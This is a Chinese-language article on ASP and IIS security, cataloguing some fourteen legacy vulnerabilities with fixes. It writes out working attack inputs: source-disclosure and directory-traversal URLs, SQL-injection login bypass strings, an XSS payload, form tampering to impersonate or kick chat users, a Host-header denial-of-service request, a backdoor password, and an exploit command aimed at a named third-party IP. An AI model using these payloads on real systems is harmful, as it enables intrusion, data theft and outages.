LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

ASP網(wǎng)絡(luò)安全

admin
2011年4月24日 0:33 本文熱度 2800
一 前言
Microsoft Active Server Pages(ASP)是服務(wù)器端腳本編寫環(huán)境,使用它可以創(chuàng)建和運(yùn)行動(dòng)態(tài)、交互的 Web 服務(wù)器應(yīng)用程序。使用 ASP 可以組合 HTML 頁 、腳本命令和 ActiveX 組件以創(chuàng)建交互的 Web 頁和基于 Web 的功能強(qiáng)大的應(yīng)用程序。 現(xiàn)在很多網(wǎng)站特別是電子商務(wù)方面的網(wǎng)站,在前臺(tái)上大都用ASP來實(shí)現(xiàn)。以至于現(xiàn)在ASP在網(wǎng)站應(yīng)用上很普遍。ASP是開發(fā)網(wǎng)站應(yīng)用的快速工具,但是有些網(wǎng)站管理員只看到ASP的快速開發(fā)能力,卻忽視了ASP安全問題。ASP從一開始就一直受到眾多漏洞,后門的困擾,包括%81的噩夢(mèng),密碼驗(yàn)證問題,IIS漏洞等等都一直使ASP網(wǎng)站開發(fā)人員心驚膽跳。
本文試圖從開放了ASP服務(wù)的操作系統(tǒng)漏洞和ASP程序本身漏洞,闡述ASP安全問題,并給出解決方法或者建議。
二 關(guān)鍵字

ASP,網(wǎng)絡(luò)安全,IIS,SSL,加密。
三 ASP工作機(jī)理

Active Server Page技術(shù)為應(yīng)用開發(fā)商提供了基于腳本的直觀、快速、高效的應(yīng)用開發(fā)手段,極大地提高了開發(fā)的效果。在討論ASP的安全性問題之前,讓我們來看看ASP是怎么工作的。ASP腳本是采用明文(plain text)方式來編寫的。

ASP腳本是一系列按特定語法(目前支持vbscript和jscript兩種腳本語言)編寫的,與標(biāo)準(zhǔn)HTML頁面混合在一起的腳本所構(gòu)成的文本格式的文件。當(dāng)客戶端的最終用戶用WEB瀏覽器通過INTERNET來訪問基于ASP腳本的應(yīng)用時(shí),WEB瀏覽器將向WEB服務(wù)器發(fā)出HTTP請(qǐng)求。WEB服務(wù)器分析、判斷出該請(qǐng)求是ASP腳本的應(yīng)用后,自動(dòng)通過ISAPI接口調(diào)用ASP腳本的解釋運(yùn)行引擎(ASP.DLL)。ASP.DLL將從文件系統(tǒng)或內(nèi)部緩沖區(qū)獲取指定的ASP腳本文件,接著就進(jìn)行語法分析并解釋執(zhí)行。最終的處理結(jié)果將形成HTML格式的內(nèi)容,通過WEB服務(wù)器"原路"返回給WEB瀏覽器,由WEB瀏覽器在客戶端形成最終的結(jié)果呈現(xiàn)。這樣就完成了一次完整的ASP腳本調(diào)用。若干個(gè)有機(jī)的ASP腳本調(diào)用就組成了一個(gè)完整的ASP腳本應(yīng)用。
讓我們來看看運(yùn)行ASP所需的環(huán)境:

Microsoft Internet Information Server 3.0/4.0/5.0 on NT Server
Microsoft Internet Information Server 3.0/4.0/5.0 on Win2000
Microsoft Personal Web Server on Windows 95/98

WINDOWS NT Option Pack所帶的Microsoft IIS提供了強(qiáng)大的功能,但是IIS在網(wǎng)絡(luò)安全方面卻是比較危險(xiǎn)的。因?yàn)楹苌儆腥藭?huì)用Windows 95/98當(dāng)服務(wù)器,因此本文我更多的從NT中的IIS安全問題來探討。

四 微軟自稱的ASP的安全優(yōu)點(diǎn)

雖然我們本文的重點(diǎn)是探討ASP漏洞和后門,但是有必要談?wù)凙SP在網(wǎng)絡(luò)安全方面的"優(yōu)點(diǎn)",之所以加個(gè)"",是因?yàn)橛袝r(shí)這些微軟宣稱的"優(yōu)點(diǎn)"恰恰是其安全隱犯。

微軟稱ASP在網(wǎng)絡(luò)安全方面一大優(yōu)點(diǎn)就是用戶不能看到ASP的源程序,從ASP的原理上看,ASP在服務(wù)端執(zhí)行并解釋成標(biāo)準(zhǔn)的HTML語句,再傳送給客戶端瀏覽器。"屏蔽"源程序能很好的維護(hù)ASP開發(fā)人員的版權(quán),試想你辛辛苦苦做了一個(gè)很優(yōu)秀的程序,給人任意COPY,你會(huì)怎么想?而且黑客還能分析你的ASP程序,挑出漏洞。更重要的是有些ASP開發(fā)者喜歡把密碼,有特權(quán)的用戶名和路徑直接寫在程序中,這樣別人通過猜密碼,猜路徑,很容易找到攻擊系統(tǒng)的"入口"。但是目前已經(jīng)發(fā)現(xiàn)了很多能查看ASP源程序的漏洞,后面我們還要討論。

IIS支持虛擬目錄,通過在"服務(wù)器屬性"對(duì)話框中的"目錄"標(biāo)簽可以管理虛擬目錄。建立虛擬目錄對(duì)于管理WEB站點(diǎn)具有非常重要的意義。虛擬目錄隱藏了有關(guān)站點(diǎn)目錄結(jié)構(gòu)的重要信息。因?yàn)樵跒g覽器中,客戶通過選擇"查看源代碼",很容易就能獲取頁面的文件路徑信息,如果在WEB頁中使用物理路徑,將暴露有關(guān)站點(diǎn)目錄的重要信息,這容易導(dǎo)致系統(tǒng)受到攻擊。其次,只要兩臺(tái)機(jī)器具有相同的虛擬目錄,你就可以在不對(duì)頁面代碼做任何改動(dòng)的情況下,將WEB頁面從一臺(tái)機(jī)器上移到另一臺(tái)機(jī)器。還有就是,當(dāng)你將WEB頁面放置于虛擬目錄下后,你可以對(duì)目錄設(shè)置不同的屬性,如:Read、Excute、Script。讀訪問表示將目錄內(nèi)容從IIS傳遞到瀏覽器。而執(zhí)行訪問則可以使在該目錄內(nèi)執(zhí)行可執(zhí)行的文件。當(dāng)你需要使用ASP時(shí),就必須將你存放.asp文件的目錄設(shè)置為"Excute(執(zhí)行)"。建議大家在設(shè)置WEB站點(diǎn)時(shí),將HTML文件同ASP文件分開放置在不同的目錄下,然后將HTML子目錄設(shè)置為"讀",將ASP子目錄設(shè)置為"執(zhí)行",這不僅方便了對(duì)WEB的管理,而且最重要的提高了ASP程序的安全性,防止了程序內(nèi)容被客戶所訪問。

五 ASP漏洞分析和解決方法

有人說一臺(tái)不和外面聯(lián)系的電腦是最安全的電腦,一個(gè)關(guān)閉所有端口,不提供任何服務(wù)的電腦也是最安全的。黑客經(jīng)常利用我們所開放的端口實(shí)施攻擊,這些攻擊最常見的是DDOS(拒絕服務(wù)攻擊).下面我會(huì)列出ASP的二十幾個(gè)漏洞,每個(gè)漏洞都會(huì)有漏洞描述和解決方法。
1 在ASP程序后加個(gè)特殊符號(hào),能看到ASP源程序
受影響的版本:
win95+pws
IIS3.0
98+pws4 不存在這個(gè)漏洞。
IIS4.0以上的版本也不存在這個(gè)漏洞。
問題描述:
這些特殊符號(hào)包括小數(shù)點(diǎn),%81, ::$DATA。比如:
http://someurl/somepage.asp.
http:// someurl/somepage.asp%81
http:// someurl/somepage.asp::$DATA
http:// someurl/somepage.asp %2e
http:// someurl/somepage %2e%41sp
http:// someurl/somepage%2e%asp
http:// someurl/somepage.asp %2e
http://someurl/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../boot.ini
(可以看到boot.ini的文件內(nèi)容)那么在安裝有IIS3.0和win95+PWS的瀏覽中就很容易看到somepage.asp的源程序。究竟是什么原因造成了這種可怕的漏洞呢?究其根源其實(shí)是 Windows NT 特有的文件系統(tǒng)在做怪。有一點(diǎn)常識(shí)的人都知道在 NT 提供了一種完全不同于 FAT 的文件系統(tǒng):NTFS,這種被稱之為新技術(shù)文件系統(tǒng)的技術(shù)使得 NT 具有了較高的安全機(jī)制,但也正是因?yàn)樗a(chǎn)生了不少令人頭痛的隱患。大家可能不知道, NTFS 支持包含在一個(gè)文件中 的多數(shù)據(jù)流,而這個(gè)包含了所有內(nèi)容的主數(shù)據(jù)流被稱之為"DATA",因此使得在瀏覽器 里直接訪問 NTFS 系統(tǒng)的這個(gè)特性而輕易的捕獲在文件中的腳本程序成為了可能。然而 直接導(dǎo)致 ::$DATA 的原因是由于 IIS 在解析文件名的時(shí)候出了問題,它沒有很好地規(guī)范文件名。

解決方法和建議:

如果是Winodws NT用戶,安裝IIS4.0或者IIS5.0,Windows2000不存在這個(gè)問題。如果是win95用戶,安裝WIN98和PWS4.0。


2 ACCESS mdb 數(shù)據(jù)庫有可能被下載的漏洞

問題描述:

在用ACCESS做后臺(tái)數(shù)據(jù)庫時(shí),如果有人通過各種方法知道或者猜到了服務(wù)器的ACCESS數(shù)據(jù)庫的路徑和數(shù)據(jù)庫名稱,那么他能夠下載這個(gè)ACCESS數(shù)據(jù)庫文件,這是非常危險(xiǎn)的。比如:如果你的ACCESS數(shù)據(jù)庫book.mdb放在虛擬目錄下的database目錄下,那么有人在瀏覽器中打入:
http:// someurl/database/book.mdb如果你的book.mdb數(shù)據(jù)庫沒有事先加密的話,那book.mdb中所有重要的數(shù)據(jù)都掌握在別人的手中。

解決方法:

(1) 為你的數(shù)據(jù)庫文件名稱起個(gè)復(fù)雜的非常規(guī)的名字,并把他放在幾目錄下。所謂"非常規(guī)",打個(gè)比方:比如有個(gè)數(shù)據(jù)庫要保存的是有關(guān)書籍的信息,可不要把他起個(gè)"book.mdb"的名字,起個(gè)怪怪的名稱,比如d34ksfslf.mdb,再把他放在如./kdslf/i44/studi/ 的幾層目錄下,這樣黑客要想通過猜的方式得到你的ACCESS數(shù)據(jù)庫文件就難上加難了。
(2)不要把數(shù)據(jù)庫名寫在程序中。有些人喜歡把DSN寫在程序中,比如:

DBPath = Server.MapPath("cmddb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath

假如萬一給人拿到了源程序,你的ACCESS數(shù)據(jù)庫的名字就一覽無余。因此建議你在ODBC里設(shè)置數(shù)據(jù)源,再在程序中這樣寫:
conn.open "shujiyuan"
(3)使用ACCESS來為數(shù)據(jù)庫文件編碼及加密。首先在選取"工具->安全->加密/解密數(shù)據(jù)庫,選取數(shù)據(jù)庫(如:employer.mdb),然后接確定,接著會(huì)出現(xiàn)"數(shù)據(jù)庫加密后另存為"的窗口,存為:employer1.mdb。接著employer.mdb就會(huì)被編碼,然后存為employer1.mdb..
要注意的是,以上的動(dòng)作并不是對(duì)數(shù)據(jù)庫設(shè)置密碼,而只是對(duì)數(shù)據(jù)庫文件加以編碼,目的是為了防止他人使用別的工具來查看數(shù)據(jù)庫文件的內(nèi)容。
接下來我們?yōu)閿?shù)據(jù)庫加密,首先以打開經(jīng)過編碼了的employer1.mdb,在打開時(shí),選擇"獨(dú)占"方式。然后選取功能表的"工具->安全->設(shè)置數(shù)據(jù)庫密碼",接著輸入密碼即可。
為employer1.mdb設(shè)置密碼之后,接下來如果再使用ACCEES數(shù)據(jù)庫文件時(shí),則ACCESS會(huì)先要求輸入密碼,驗(yàn)證正確后才能夠啟動(dòng)數(shù)據(jù)庫。
不過要在ASP程序中的connection對(duì)象的open方法中增加PWD的參數(shù)即可,例如:

param="driver={Microsoft Access Driver (*.mdb)};Pwd=yfdsfs"
param=param&";dbq="&server.mappath("employer1.mdb")
conn.open param

這樣即使他人得到了employer1.mdb文件,沒有密碼他是無法看到employer1.mdb的。


3 code.asp文件會(huì)泄漏ASP代碼

問題描述:

舉個(gè)很簡單的例子,在微軟提供的 ASP1.0 的例程里有一個(gè) .asp 文件專門用來查看其它 .asp 文件的源代碼,該文件為
 ASPSamp/Samples/code.asp。如果有人把這個(gè)程序上傳到服務(wù)器,而服務(wù)器端沒有任何防范措施的話,他就可以很容易地查看他人的程序。例如 :
  code.asp?source=/directory/file.asp
不過這是個(gè)比較舊的漏洞了,相信現(xiàn)在很少會(huì)出現(xiàn)這種漏洞。
下面這命令是比較新的:
http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp
最大的危害莫過于asa文件可以被上述方式讀出;數(shù)據(jù)庫密碼以明文形式暴露在黑客眼前;

問題解決或建議:

對(duì)于IIS自帶的show asp code的asp程序文件,刪除該文件或者禁止訪問該目錄即可


4、filesystemobject 組件篡改下載 fat 分區(qū)上的任何文件的漏洞

問題描述:

  IIS3、 IIS4 的 ASP 的文件操作都可以通過 filesystemobject 實(shí)現(xiàn),包括文本文件的讀寫目錄操作、文件的拷貝改名刪除等,但是這個(gè)強(qiáng)大的功能也留下了非常危險(xiǎn)的 "后門"。利用 filesystemobjet 可以篡改下載 fat 分區(qū)上的任何文件。即使是 ntfs 分區(qū),如果權(quán)限沒有設(shè)定好的話,同樣也能破壞,一不小心你就可能遭受"滅頂之災(zāi) "。遺憾的是很多 webmaster 只知道讓 web 服務(wù)器運(yùn)行起來,很少對(duì) ntfs 進(jìn)行權(quán)限 設(shè)置,而 NT 目錄權(quán)限的默認(rèn)設(shè)置偏偏安全性又低得可怕。因此,如果你是 Webmaster,建議你密切關(guān)注服務(wù)器的設(shè)置,盡量將 web 目錄建在 ntfs 分區(qū)上,目錄不要設(shè)定 everyone full control,即使是是管理員組的成員一般也沒什么必要 full control,只要有讀取、更改權(quán)限就足夠了。 也可以把filesystemobject的組件刪除或者改名。


5、輸入標(biāo)準(zhǔn)的HTML語句或者javascript語句會(huì)改變輸出結(jié)果

問題描述:

在輸入框中打入標(biāo)準(zhǔn)的HTML語句會(huì)得到什么相的結(jié)果呢?比如一個(gè)留言本,我們留言內(nèi)容中打入:

<font size=10>你好!</font>

如果你的ASP程序中沒有屏蔽html語句,那么就會(huì)改變"你好"字體的大小。在留言本中改變字體大小和貼圖有時(shí)并不是什么壞事,反而可以使留言本生動(dòng)。但是如果在輸入框中寫個(gè) javascript 的死循環(huán),比如:<a herf="http://someurl" onMouseover="while(1){window.close(/)}">特大新聞</a>
那么其他查看該留言的客人只要移動(dòng)鼠標(biāo)到"特大新聞",上就會(huì)使用戶的瀏覽器因死循環(huán)而死掉。

解決方法和建議:

編寫類似程序時(shí)應(yīng)該做好對(duì)此類操作的防范,譬如可以寫一段程序判斷客戶端的輸入,并屏蔽掉所有的 HTML、 Javascript 語句。


6、ASP程序密碼驗(yàn)證漏洞

漏洞描述:

很多網(wǎng)站把密碼放到數(shù)據(jù)庫中,在登陸驗(yàn)證中用以下sql,(以asp為例)
sql="select * from user where username="&username&"and pass="& pass &"
此時(shí),您只要根據(jù)sql構(gòu)造一個(gè)特殊的用戶名和密碼,如:ben or 1=1
就可以進(jìn)入本來你沒有特權(quán)的頁面。再來看看上面那個(gè)語句吧:
sql="select * from user where username="&username&"and pass="& pass&"
此時(shí),您只要根據(jù)sql構(gòu)造一個(gè)特殊的用戶名和密碼,如:ben or 1=1
這樣,程序?qū)?huì)變成這樣: sql="select*from username where username="&benor1=1&"and pass="&pass&"
or 是一個(gè)邏輯運(yùn)算符,作用是在判斷兩個(gè)條件的時(shí)候,只要其中一個(gè)條件成立,那么等式將會(huì)成立.而在語言中,是以1來代表真的(成立).那么在這行語句中,原語句的"and"驗(yàn)證將不再繼續(xù),而因?yàn)?1=1"和"or"令語句返回為真值.。
另外我們也可以構(gòu)造以下的用戶名:
username=aa or username<>aa
pass=aa or pass<>aa
相應(yīng)的在瀏覽器端的用戶名框內(nèi)寫入:aa or username<>aa
口令框內(nèi)寫入:aa or pass<>aa,注意這兩個(gè)字符串兩頭是沒有的。
這樣就可以成功的騙過系統(tǒng)而進(jìn)入。

后一種方法理論雖然如此,但要實(shí)踐是非常困難的,下面兩個(gè)條件都必須具備。

1. 你首先要能夠準(zhǔn)確的知道系統(tǒng)在表中是用哪兩個(gè)字段存儲(chǔ)用戶名和口令的,只有這樣你才能準(zhǔn)確的構(gòu)造出這個(gè)進(jìn)攻性的字符串。實(shí)際上這是很難猜中的。
2.系統(tǒng)對(duì)你輸入的字符串不進(jìn)行有效性檢查。

問題解決和建議:

對(duì)輸入的內(nèi)容驗(yàn)證和""號(hào)的處理。


7、IIS4或者IIS5中安裝有INDEX SERVER服務(wù)會(huì)漏洞ASP源程序

問題描述:

在運(yùn)行IIS4或者IIS5的Index Server,輸入特殊的字符格式可以看到ASP源程序或者其它頁面的程序。甚至以及添打了最近關(guān)于參看源代碼的補(bǔ)丁程序的系統(tǒng),或者沒有.htw文件的系統(tǒng),一樣存在該問題。獲得asp程序,甚至global.asa文件的源代碼,無疑對(duì)系統(tǒng)是一個(gè)非常重大的安全隱患。往往這些代碼中包含了用戶密碼和ID,以及數(shù)據(jù)庫的源路徑和名稱等等。這對(duì)于攻擊者收集系統(tǒng)信息,進(jìn)行下一步的入侵都是非常重要的。
通過構(gòu)建下面的特殊程序可以參看該程序源代碼:
http://202.116.26.38/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full
這樣只是返回一些html格式的文件代碼,但是當(dāng)你添加%20到CiWebHitsFile的參數(shù)后面,如下:
http://someurl/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
這將獲得該程序的源代碼。
(注意:/default.asp是以web的根開始計(jì)算。如某站點(diǎn)的http:///welcome/welcome.asp
那么對(duì)應(yīng)就是:
http://someurl/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full

由于null.htw文件并非真正的系統(tǒng)映射文件,所以只是一個(gè)儲(chǔ)存在系統(tǒng)內(nèi)存中的虛擬文件。哪怕你已經(jīng)從你的系統(tǒng)中刪除了所有的真實(shí)的.htw文件,但是由于對(duì)null.htw文件的請(qǐng)求默認(rèn)是由webhits.dll來處理。所以,IIS仍然收到該漏洞的威脅。

問題解決或者建議:

如果該webhits提供的功能是系統(tǒng)必須的,請(qǐng)下載相應(yīng)的補(bǔ)丁程序。如果沒必要,請(qǐng)用IIS的MMC管理工具簡單移除.htw的映象文件。
補(bǔ)丁程序如下:
Index Server 2.0:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726


8、ASP聊天室程序的漏洞

問題描述:

如果聊天室ASP程序設(shè)計(jì)不當(dāng),很容易會(huì)給他人利用來做壞事:可以踢人,穿墻,搗亂.
首先,我們看看聊天室里有什么漏洞,大家看看下面這段代碼:

<html>
<head>
<body BGCOLOR="008888" TEXT="FFFFFF">
…………………………
………………
………
<form NAME="sendmsg" ACTION="chatt.asp" METHOD="POST" target="mtalk1"
OnSubmit="return chksend();">
<input type="hidden" name="username" value="測(cè)試者">******
<input type="hidden" name="sex" value="boy">********
<input type="hidden" name="message" value="">
<input type="hidden" name="a_method" value="sendtalk">
<div align="center"><center>
<table CELLSPACING="0" CELLPADDING="0"> <tr>
<td>發(fā)言: <input type="text" name="msg" size="60"> </td>
<td><input type="submit" value="發(fā) 言"> </td>
</tr>
<tr>
<td>悄悄:<input type=checkbox name=mtalk value=1>
對(duì)象:<input type="text" name="betalk" size="10">
表情:<select NAME="exp" onChange="document.sendmsg.msg.focus();documen
t.sendmsg.msg.select();" size="1">
………
……………
……………………
</form>
<form name="getout" ACTION="chatt.pl" METHOD="POST">
<input type="hidden" name="username" value="測(cè)試者">!!!!!!
<input type="hidden" name="a_method" value="getout">!!!!
<input type="submit" value="退 出"></td>
</form>
</body>
</html>
以上這段代碼是我在某個(gè)聊天室用"測(cè)試者"作代號(hào)登陸后在發(fā)言幀當(dāng)下來的, 這只是一小部份,但在這一小部份代碼里面就有兩個(gè)漏洞。

第一個(gè)漏洞
大家看看上面的代碼加上"*"號(hào)的那兩句,其中第一句中的"測(cè)試者"就是我登陸的名字,還有,第二句中的"boy"是登陸時(shí)的性別,還有再看看下面我加上"!" 號(hào)的兩句,第一句里還是有我登陸時(shí)的名字,這幾句都是我現(xiàn)在想說的兩個(gè)漏洞所在點(diǎn)。如果想在這個(gè)聊天室里穿墻的話,只要把發(fā)言幀的代碼當(dāng)下來另存,把"form"的"action"改成聊天室的地址,然后把再"*"號(hào)的第一句的"測(cè)試者"兩字改成想要的名字就可以了。也可以變換性別,只要把第二句的 "boy"改成"girl"。這就是所謂的穿墻術(shù)了。你甚至可以把它改成在線人的名字,然后發(fā)言,這樣就冒充別人的姓名談話。

第二個(gè)漏洞
踢人的漏洞就是這個(gè)了,我們看一下帶"!"號(hào)的第一句,上面有是合法用戶登陸的名字,再看第二句,他有"getout",再加上上面還有一段"form"標(biāo)簽,這段就是我們退出聊天室時(shí)的代碼,這個(gè)有什么用呢?我們先試試看,首先還是把"form"標(biāo)簽的"action"改成 聊天室的地址,不然就不知道提交給哪個(gè)家伙了。然后把"風(fēng)風(fēng)"改成你想踢下去的人的名字然后單擊"退出",那就把那個(gè)人踢出聊天室了。這個(gè)就是聊天室踢人的漏洞。
這兩個(gè)漏洞主要的原因是這兩個(gè)漏洞使服務(wù)程序不識(shí)別客戶發(fā)出的指令是不是合法用戶。 以上兩漏騙服務(wù)程序來更名發(fā)出發(fā)言,或更名退出,使得真正的使用者受害。
當(dāng)然上面的程序中還有一個(gè)漏洞,輸入框沒有對(duì)HTML語句和JAVASCRIPT語句做過濾。這個(gè)問題我們?cè)诼┒?中已有詳細(xì)分析,這里就不談了。

問題解決或者建議:

在程序設(shè)計(jì)中讓服務(wù)程序能識(shí)別到底是哪個(gè)家伙發(fā)出的指令就可以了,具體做法可以為每個(gè)聊天者發(fā)一個(gè)識(shí)別碼,象五筆字一樣,也可以用每個(gè)聊天者的密碼識(shí)別,也可以把聊天者的密碼隨機(jī)加密后用作識(shí)別等等 ,反正能使你的服務(wù)程序識(shí)別到底是誰發(fā)出的指令就可以了。


9、NT iss4.0_AuthChangeUrl? 漏洞

問題描述:

在NT iis4.0,當(dāng)輸入如下命令時(shí)
http://someurl/_AuthChangeUrl?<font%20size=7%20color=red>你好
你看到發(fā)生了什么嗎?<font size=7 color=red>被解釋成功。出現(xiàn)了紅色的放大的"你好"字
我們?cè)賮砜纯匆韵碌拿睿?
http://someurl/_AuthChangeUrl?<img%20src=file:\\\c:\1.jpg>
上面的命令將顯示c:根目錄下的1.jpg圖片,如果1.jpg存在的話。
http://someurl/_AuthChangeUrl?<a%20href=file:///c:/install.exe>
上面的命令將下載C:根目錄下的install.exe文件。
按照這種方法還能打開對(duì)方服務(wù)器上一個(gè)已經(jīng)知道的文本文件。


10、微軟開發(fā)的兩個(gè)動(dòng)態(tài)庫存在后門允許用戶查看ASP文件源程序和下載整個(gè)網(wǎng)站

問題描述:

隨IIS和Frontpage Extention server而來的動(dòng)態(tài)庫程序,存在后門,允許用戶遠(yuǎn)程讀取asp、asa和CGI程序的源代碼。但這個(gè)動(dòng)態(tài)庫要求有密碼,這個(gè)后門的密碼是: "Netscape engineers are weenies!"
程序路徑為: /_vti_bin/_vti_aut/dvwssr.dll
一般安裝了 Frontpage98的 IIS服務(wù)器都有這個(gè)路徑和文件。這個(gè)程序要求解碼后才能發(fā)揮讀取asp等源程序,有趣的是,這個(gè)密碼正是嘲弄其競(jìng)爭(zhēng)對(duì)手Netscape的。
現(xiàn)提供一個(gè)有該漏洞的國外網(wǎng)站給安全技術(shù)人員參考:
http://62.236.90.195
關(guān)于讀取源程序,請(qǐng)下載這個(gè)測(cè)試程序,用法為:
[john@Linux john]$ ./dvwssr1.pl 62.236.90.195 /cqsdoc/showcode.asp
測(cè)試程序: http://www.cnns.net/exploits/nt/dvwssr1.pl


11、漏洞名稱:IIS4.0受HTTP的D.O.S攻擊漏洞

問題描述:

受影響的版本:IIS 4.0以及更早的版本
這是一個(gè)很簡單的方法.發(fā)送很多的"Host:aaaaa...aa"到IIS:

GET / HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 lines
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)

發(fā)送了象上面所寫的兩次請(qǐng)求后,對(duì)方的IIS在接受了這些請(qǐng)求后就會(huì)導(dǎo)致內(nèi)存溢出.當(dāng)然,它就不能對(duì)更多的請(qǐng)求作出反應(yīng)。因?yàn)閷?duì)方正缺乏虛擬內(nèi)存,服務(wù)器也將停止運(yùn)行。事后,對(duì)方不能通過重起web service來解決問題,而必須重啟服務(wù)器。


12 漏洞名稱:IIS5.0超長URL拒絕服務(wù)漏洞

問題描述:

Microsoft IIS 5.0在處理以".ida"為擴(kuò)展名的URL請(qǐng)求時(shí),它會(huì)有兩種結(jié)果。一個(gè)可能的結(jié)果是服務(wù)器回復(fù)"URL String too long"的信息;或類似"Cannot find the specified path" 的信息。另一種可能就是服務(wù)器端服務(wù)停止,并返回"Access Violation"信息(即成功的實(shí)現(xiàn)了對(duì)服務(wù)器端的拒絕服務(wù)攻擊)
當(dāng)遠(yuǎn)端攻擊者發(fā)出類似如下的請(qǐng)求時(shí):
http://someurl/...[25kb of .]...ida
服務(wù)器端會(huì)崩潰(導(dǎo)致拒絕服務(wù)攻擊)或返回該文件不在當(dāng)前路徑的信息(暴露文件物理地址)

問題解決或者建議:

大多數(shù)情況下,站點(diǎn)很少使用擴(kuò)展名為".ida"和".idq"的文件,可在ISAPI腳本映射中,將擴(kuò)展名為".ida"和".idq"的應(yīng)用程序映射刪除。


13 請(qǐng)求不存在的擴(kuò)展名為idq或ida 文件,會(huì)暴露服務(wù)器上得物理地址

問題描述:

通過請(qǐng)求一個(gè)不存在的擴(kuò)展名為idq或ida得文件,IIS會(huì)暴露文件在服務(wù)器上得物理地址.這樣會(huì)給攻擊者提供了不必要的信息,而且,這對(duì)攻擊一個(gè)Web站點(diǎn)來說,是很有價(jià)值的第一步。

測(cè)試程序:

通過請(qǐng)求如:
http://someurl/anything.ida
http://someurl/lunwen/anything.ida
或:
http://someurl/anything.idq
一個(gè)遠(yuǎn)端用戶可以收到類似:The IDQ d:\http\anything.idq could not be found的響應(yīng)。
這樣的一個(gè)響應(yīng)就會(huì)讓攻擊者獲得了Web站點(diǎn)的物理路徑,并且還可以獲得更多的有關(guān)該站點(diǎn)在服務(wù)器上的組織與結(jié)構(gòu)。


14、NT Index Server存在返回上級(jí)目錄的漏洞

問題描述

受影響的版本:Microsoft Index Server2.0 [WinNT4.0,WinNT 2000.0]
Index Sserver2.0是WinNT4.0 Option Pack中附帶的一個(gè)軟件的工具,其中的功能已經(jīng)被WinNT 2000中的Indexing Services所包含。當(dāng)與IIS結(jié)合使用時(shí),Index Server和Indexing Services便可以在最初的環(huán)境來瀏覽Web Search的結(jié)果,它將生成一個(gè)HTML文件,其中包含了查找后所返回頁面內(nèi)容的簡短引用,并將其連接至所返回的頁面[即符合查詢內(nèi)容的頁面],也就是超級(jí)連接。要做到這一點(diǎn),它便需要支持由webhits.dll ISAPI程序處理的.htw文件類型。這個(gè)dll允許在一個(gè)模版中使用"../"用做返回上級(jí)目錄的字符串.這樣,了解服務(wù)器文件結(jié)構(gòu)的攻擊者便可以遠(yuǎn)程的閱讀該機(jī)器上的任意文件了。

漏洞的利用:

1)您的系統(tǒng)中存在.htw文件
Index Server提供的這種超級(jí)連接允許Web用戶獲得一個(gè)關(guān)于他搜尋結(jié)果的返回頁,這個(gè)頁面的名字是與CiWebHitsFile變量一起通過.htw文件的,webhits.dll這個(gè)ISAPI程序?qū)⑻幚磉@個(gè)請(qǐng)求,對(duì)其進(jìn)行超級(jí)連接并返回該頁面。因此用戶便可以控制通過.htw文件的CiWebHits變量,請(qǐng)求到任何所希望獲得的信息。另外存在的一個(gè)問題便是ASP或其他腳本文件的源代碼也可以利用該方法來獲得。
上面我們說過webhits.dll后接上"../"便可以訪問到Web虛擬目錄外的文件,下面我們來看個(gè)例子:
http://somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/../../winnt/system32/logfiles/
w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
在瀏覽器中輸入該地址,便可以獲得該服務(wù)器上給定日期的Web日志文件.
在系統(tǒng)常見的.htw樣本文件有:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.hw
/iishelp/iis/misc/iirturnh.htw [這個(gè)文件通常受loopback限制]

2)您的系統(tǒng)中不存在.htw文件
調(diào)用一個(gè)webhits.dll ISAPI程序需要通過.htw文件來完成,如果您的系統(tǒng)中不存在.htw文件,雖然請(qǐng)求一個(gè)不存在的.htw文件將失敗,但是您的仍然存在可被利用的漏洞。其中的竅門便是利用inetinfo.exe來調(diào)用webhits.dll,這樣同樣能訪問到Web虛擬目錄外的文件。但我們需要通過制作一個(gè)的特殊的URL來完成該漏洞的利用。首先我們需要一個(gè)有效的文件資源,這個(gè)文件必須是一個(gè)靜態(tài)的文件,如".htm",".html",".txt"或者".gif",".jpg"。這些文件將用作模版來被webhits.dll打開?,F(xiàn)在我們需要獲得inetinfo.exe來利用webhits.dll,唯一可以做到這點(diǎn)的便是請(qǐng)求一個(gè).htw文件:

http://url/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/
ex000121.log&CiRestriction=none&CiHiliteType=Full

很明顯,這個(gè)請(qǐng)求肯定會(huì)失敗,因?yàn)橄到y(tǒng)上不存在這個(gè)文件。但請(qǐng)注意,我們現(xiàn)在已經(jīng)調(diào)用到了webhits.dll,我們只要在一個(gè)存在的文件資源后面[也就是在.htw前面]加上一串特殊的數(shù)字( %20s ),[就是在例子中default.htm后面加上這個(gè)代表空格的特殊數(shù)字],這樣我們便可以欺騙過web服務(wù)器從而達(dá)到我們的目的.由于在緩沖部分中.htw文件名字部分被刪除掉[由于%20s這個(gè)符號(hào)],所以,當(dāng)請(qǐng)求傳送到webhits.dll的時(shí)候,便可以成功的打開該文件,并返回給客戶端,而且過程中并不要求系統(tǒng)中真的存在.htw文件。

問題解決和建議:

微軟已經(jīng)對(duì)該問題發(fā)放了補(bǔ)丁:

Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Windows 2000 Indexing Services:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726


